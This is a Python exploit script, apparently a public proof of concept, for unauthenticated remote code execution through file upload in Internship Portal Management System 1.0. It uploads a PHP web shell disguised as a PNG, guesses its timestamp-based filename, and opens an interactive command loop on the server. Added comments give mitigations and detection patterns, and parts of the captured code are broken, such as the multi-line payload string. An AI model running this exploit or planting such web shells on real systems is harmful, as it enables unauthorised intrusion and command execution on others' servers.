
Internship Portal Management System 1.0 未经身份验证文件上传&任意代码执行漏洞



EXP

# Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)
# Date: 2021-05-04
# Exploit Author: argenestel
# Vendor Homepage: https://www.sourcecodester.com/php/11712/internship-portal-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11712&title=Internship+Portal+Management+System+using+PHP+with+Source+Code
# Version: 1.0
# Tested on: Debian 10

import requests
import time

#change the url to the site running the vulnerable system
#change the url to the site running the vulnerable system
url="http://127.0.0.1:4000"
#burp proxy
# NOTE(review): `proxies` is built here but never passed to any requests call
# below, so traffic does not actually go through the proxy as captured.
proxies = {
 "http": "http://127.0.0.1:8080",
}
#payload
# PHP source that becomes the uploaded file body; it passes the `cmd` request
# parameter to system(). The string literal below spans several lines and is
# not valid Python as captured on this page; it is left exactly as captured.
# Defender note: the server-side fix is to never store an upload with an
# executable extension under the web root and to disable script execution in
# the upload directory, independent of any client-supplied metadata.
payload='<?php if(isset($_REQUEST\'cmd\')){ echo "<pre>"; $cmd = ($_REQUEST\'cmd\'); system($cmd); echo "

"; die; }?>'

  1. the upload point

# Upload handler of the application. fill_details() reaches it without any
# session cookie or credentials, which is the "unauthenticated" part of the
# title; requiring authentication here removes the entry point.
insert_url=url+"/inserty.php"

def fill_details() -> None:
   """Submit the application form with a PHP file attached and, on HTTP 200, hand off to shell().

   Side effects: sets the module globals ``shellstart`` and ``shellend`` to the
   epoch seconds bracketing the upload request, prints progress messages, and
   calls ``shell()`` on success. Reads the module globals ``payload`` and
   ``insert_url``.

   Defender notes (what the request shows about the vulnerable handler):
   - No cookie, token or login is sent, so the upload endpoint is reachable
     anonymously.
   - The file part declares ``image/png`` while the body is PHP; the server
     evidently trusts the client-supplied Content-Type (or nothing at all)
     rather than inspecting the content, and keeps the ``.php`` extension.
   - Mitigation: authenticate the handler, validate uploads by server-side
     content inspection against an extension allow-list, and store them with
     a non-guessable name outside the web root.
   - Detection: a POST to /inserty.php with a multipart ``file`` part whose
     filename ends in .php but whose declared type is an image.
   """

   global payload
   global shellend
   global shellstart
   print("Online Intern System 1.0 Exploit: Unauth RCE via File Upload")
   #time start
   # Epoch second recorded just before the POST; shell() later assumes the
   # server prefixes the stored file with its own time() value, so the
   # start/end pair bounds the candidate prefixes.
   shellstart=int(time.time())
   #print(shellstart)
   # Multipart part named 'file': filename shell.php, body = PHP payload,
   # client-declared type image/png (the server must not rely on this header).
   files  = {'file':('shell.php',payload,
                   'image/png', {'Content-Disposition': 'form-data'}
                 )
             }
   # Ordinary form fields of the application form. The "email" value looks
   # like a page-extraction artifact (an obfuscated address) — TODO confirm;
   # as captured it is sent literally.
   data = {
           "company_name":"some",
           "first_name":"some",
           "last_name":"some",
           "email":"email protected",
           "gender":"Male",
           "insert_button":"Apply",
           "terms":"on"
   }
   # Note: no session/cookies and no `proxies=` argument are passed.
   r = requests.post(insert_url, data=data, files=files)
   # Success is inferred from the status code alone; a 200 only means the
   # form handler answered, not that the file was stored.
   if r.status_code == 200:
       print("Exploited Intern System Successfully...")
       shellend = int(time.time())
       #print(shellend)
       shell()
   else:
       print("Exploit Failed")

def shell() -> None:
   """Locate the stored upload by its time-based name and run an interactive command loop against it.

   Reads the module globals ``url``, ``shellstart`` and ``shellend``; loops
   forever on success (no exit condition other than an interrupt), otherwise
   prints "File Name Error".

   Defender notes:
   - The probe loop shows that stored uploads are named ``<epoch>_<original
     filename>`` under /upload/ with the original extension kept, so the
     location is guessable from the request time alone. Mitigation: random
     storage names, an extension allow-list, and no script execution in the
     upload directory.
   - Detection: a burst of GETs for /upload/<digits>_shell.php (mostly 404)
     followed by repeated GETs to the same path with a ``cmd=`` query string;
     files matching that name pattern in the upload directory.
   """

   # Try every epoch second between the recorded start and end of the POST.
   for shellname in range(shellstart, shellend+1):
       shellstr=str(shellname)
       shell_url=url+"/upload/"+shellstr+"_shell.php"
       r = requests.get(shell_url)
       if r.status_code == 200:
           # Redundant: shell_url already holds this value.
           shell_url=url+"/upload/"+shellstr+"_shell.php"
           break
   
   # After the loop shell_url is whichever candidate was last built, whether
   # or not any probe returned 200; this second GET re-checks it.
   r = requests.get(shell_url)
   if r.status_code == 200:
       print("Shell Starting...")
       # Interactive loop: each input line is appended raw (un-encoded) to the
       # query string and the response body is printed.
       while True:
           cmd=input("cmd$ ")
           r = requests.get(shell_url+"?cmd="+cmd)
           print(r.text)
   else:
       print("File Name Error")

# Script entry point: runs unconditionally at import time (no __main__ guard).
fill_details()
